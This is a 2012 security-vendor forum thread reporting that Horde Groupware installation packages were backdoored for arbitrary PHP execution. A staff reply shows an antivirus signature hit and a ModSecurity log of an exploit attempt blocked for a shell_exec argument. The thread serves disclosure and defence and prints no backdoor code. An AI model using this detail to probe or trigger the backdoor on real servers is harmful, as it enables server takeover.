store | blogs | forums | twitter | facebook | wiki | downloads | support portal
Atomic Secure Linux
It is currently Fri Nov 28, 2014 6:39 pm

» Feed - Atomicorp

All times are UTC - 5 hours [ DST ]




Post new topic Reply to topic  [ 2 posts ] 
Author Message
 Post subject: Horde Groupware contains backdoor
Unread postPosted: Fri Feb 17, 2012 3:27 pm 
Offline
Forum Regular
Forum Regular

Joined: Sat Mar 28, 2009 6:58 pm
Posts: 865
Location: Germany
Even though Plesk comes with another one it's still urgent. If someone did a manual install of horde between November 2011 and 7 February they should act immediatley.

######################
Unknown perpetrators infiltrated a backdoor into several installation packages during an attack on groupware provider Horde's FTP server. Horde 3.3.12, Groupware 1.2.10 and the webmail edition of the groupware product are all affected. Horde 4 was not modified. The CVS and Git servers are also unaffected.

Users who have installed a hacked version onto a server have thrown their systems wide open to the hackers – the backdoor enables them to execute arbitrary PHP code. By exploiting additional vulnerabilities, attackers could use this to gain complete control of the server.

According to Horde, the intrusion occurred in early November last year, but was discovered just a few days ago. The developers have now removed the backdoor from the installation packages available from the FTP server.

Users who installed one of the affected products between November 2011 and 7 February this year should download a new copy of the file or upgrade to the recently released Horde 3.3.13 or Groupware 1.2.11. The new versions also fix other critical vulnerabilities. Some Linux distributions could also contain vulnerable packages, although the developers do not say which distributions may be affected.
SOURCE:
http://www.h-online.com/open/news/item/ ... 33972.html


Top
 Profile  
 
 Post subject: Re: Horde Groupware contains backdoor
Unread postPosted: Fri Feb 17, 2012 5:54 pm 
Offline
Atomicorp Staff - Site Admin
Atomicorp Staff - Site Admin
User avatar

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3673
Location: Chantilly, VA
Thanks for letting everyone know. If you are running ASL you have both signatures for the backdoored horde, plus rules to prevent it from being used:

$ clamscan open_calendar.js
open_calendar.js: Atomicorp.backdoored.horde.20120217165001.UNOFFICIAL FOUND

And heres the exploit of the backdoor being blocked:

[modsecurity] [client 127.0.0.1] [domain localhost] [403] [/20120217/20120217-1807/20120217-180744-AypwsMCoAfkAABZ6PFsAAAAE] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "732"] [id "340095"] [rev "36"] [msg "Atomicorp.com WAF Rules: Possible PHP function in Argument - this may be an attack."] [data "shell_exec : '"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Match of "rx (/wp-login\\.php\\?vaultpress=true|/site-content/|^/admin/editform)" against "REQUEST_URI" required.

_________________
Michael Shinn
Atomicorp - Security For Everyone

Co-Author of Troubleshooting Linux Firewalls.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 2 posts ] 

» Feed - Atomicorp

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: No registered users and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group